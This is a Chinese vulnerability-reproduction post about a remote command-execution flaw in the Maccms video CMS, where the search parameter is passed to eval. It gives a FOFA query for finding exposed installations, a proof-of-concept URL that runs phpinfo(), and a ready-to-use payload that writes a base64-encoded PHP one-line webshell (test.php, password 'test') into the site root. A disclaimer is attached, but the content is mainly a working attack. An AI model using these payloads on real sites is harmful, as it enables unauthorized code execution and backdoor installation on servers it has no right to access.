【漏洞复现】maccms苹果cms 命令执行漏洞

漏洞描述

感谢提供更多信息。"苹果CMS" 似乎是指 "Maccms",这是一款开源的内容管理系统,主要用于搭建视频网站。Maccms 提供了一套完整的解决方案,包括用户管理、视频上传、分类管理、数据统计等功能,使用户能够方便地创建和管理自己的视频网站。

搜索页面搜索参数过滤不严 导致直接eval执行PHP语句,前台命令执行可getshell

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

资产确定

fofa app="maccms"

漏洞复现

复制代码
poc  post 请求
http://ip/index.php?m=vod-search&wd={if-A:phpinfo()}{endif-A}

a=phpinfo()

写入网站根目录一句话木马文件payload(文件名:test.php,密码:test)

http://0-sec.org/index.php?m=vod-search&wd={if-A:print(fputs%28fopen%28base64_decode%28dGVzdC5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW3Rlc3RdKTsgPz4%29%29)}{endif-A

修复方案

相关推荐
烟斗与演绎1 小时前
综合实验(4)
网络·网络安全·智能路由器
吃不得辣条2 小时前
网络安全笔记
笔记·web安全·智能路由器
m0_7472660910 小时前
代码审计与web安全选择题1
网络安全
编程到天明14 小时前
CTF-Web题解:“require_once(‘flag.php‘); &assert(“$i == $u“);”
网络安全·php
Johny_Zhao15 小时前
CentOS Stream 9上部署FTP应用服务的两种方法(传统安装和docker-compose)
linux·网络安全·信息安全·kubernetes·云计算·containerd·ftp·yum源·系统运维
还是奇怪16 小时前
深入解析三大Web安全威胁:文件上传漏洞、SQL注入漏洞与WebShell
sql·安全·web安全
终焉暴龙王2 天前
CTFHub web进阶 php Bypass disable_function通关攻略
开发语言·安全·web安全·php
百川2 天前
Apache文件解析漏洞
web安全·apache
希望奇迹很安静2 天前
SSRF_XXE_RCE_反序列化学习
学习·web安全·ctf·渗透测试学习
程序员编程指南2 天前
Qt 网络编程进阶:网络安全与加密
c语言·网络·c++·qt·web安全